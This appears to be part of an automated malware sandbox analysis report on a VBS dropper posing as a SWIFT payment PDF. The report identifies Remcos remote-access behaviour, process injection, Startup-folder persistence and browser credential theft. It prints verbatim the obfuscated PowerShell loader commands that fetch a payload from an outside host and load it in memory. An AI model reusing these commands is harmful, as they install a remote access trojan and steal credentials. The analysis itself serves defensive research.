            Source: svchost.exe, 0000000E.00000002.3370131145.000001C4FB256000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3370036548.000001C4FB241000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: svchost.exe, 00000056.00000002.3364421731.000000000363F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: svchost.exe, 00000056.00000002.3364421731.000000000363F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: wscript.exe, 00000000.00000003.2053306719.0000022448D24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ehKiAltTWegWGALbNmWxlGKicoNaLhLSfkgPvmCicLWJRKWZiqxKUhLKLkhLKKLqiloo
            Source: svchost.exe, 00000025.00000002.2697086161.0000000003240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 0000000E.00000002.3367619122.000001C4F5C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.2054228773.0000022448B33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DehKiAltTWegWGALbNmWxlGKicoNaLhLSfkgPvmCicLWJRKWZiqxKUhLKLkhLKKLqilooPxLaop
            Source: powershell.exe, 00000008.00000002.2431197245.00000180F0CE9000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe API call chain: ExitProcess graph end node graph_10-47555
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004327AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041A8DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004407B5 mov eax, dword ptr fs:[00000030h] 10_2_004407B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,10_2_00410763
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004328FC SetUnhandledExceptionFilter,10_2_004328FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004398AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00432D5C

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_0041642D GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_0041642D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 456000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 46E000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 474000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 475000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 476000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47B000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 100E008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BAB008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 263B008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2875008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 295A008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C9A008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 29AB008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2721008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F1E008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2970008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B7C008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 293B008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D9C008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 3086008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 10_2_00410B5C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004175E1 mouse_event,10_2_004175E1
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\swift 103 202406111301435660 110624-pdf.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&((variable '*mdr*').name[3,11,2]-join'') ( ('u'+'0du'+'rl'+' = j'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/nodetecto'+'n/'+'nodete'+'c'+'ton/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'detahno'+'th-v.tx'+'tj'+'hu; u0db'+'ase64conte'+'nt = '+'(new-obje'+'ct sys'+'tem.net.web'+'cli'+'e'+'nt)'+'.downloadst'+'r'+'ing(u0d'+'url); u0'+'dbi'+'na'+'r'+'ycontent'+' = [sys'+'t'+'e'+'m.'+'co'+'n'+'v'+'e'+'r'+'t]'+'::f'+'rombase64stri'+'ng'+'(u0dbase'+'64conte'+'nt); '+'u'+'0dass'+'embly'+' = [refl'+'ec'+'tion.a'+'ssemb'+'l'+'y]'+'::l'+'oa'+'d'+'('+'u0'+'db'+'in'+'a'+'ryc'+'ont'+'ent)'+'; [dnlib.i'+'o'+'.ho'+'me]::va'+'i'+'(d6g0'+'/'+'o'+'yu'+'lx/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gaddi'+'n'+'pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').replace('u0d','$').replace(([char]74+[char]104+[char]117),[string][char]39).replace('d6g',[string][char]34))"
            Source: AddInProcess32.exe, 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.dr Binary or memory string: [Program Manager]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004329DA cpuid 10_2_004329DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,10_2_0044F17B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,10_2_0044F130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,10_2_0044F216
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_0044F2A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoA,10_2_0040E2BB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,10_2_0044F4F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_0044F61C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,10_2_0044F723
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_0044F7F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: EnumSystemLocalesW,10_2_00445914
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: GetLocaleInfoW,10_2_00445E1C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_0044EEB8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_00404F31 GetLocalTime,CreateEventA,CreateThread,10_2_00404F31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004195F8 GetComputerNameExW,GetUserNameW,10_2_004195F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 10_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_004466BF
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.AddInProcess32.exe.1587080.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTR
            Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 10_2_0040A953
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 10_2_0040AA71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: \key3.db 10_2_0040AA71

            Remote Access Functionality

            Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.AddInProcess32.exe.1587080.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTR
            Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: cmd.exe 10_2_0040567A
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
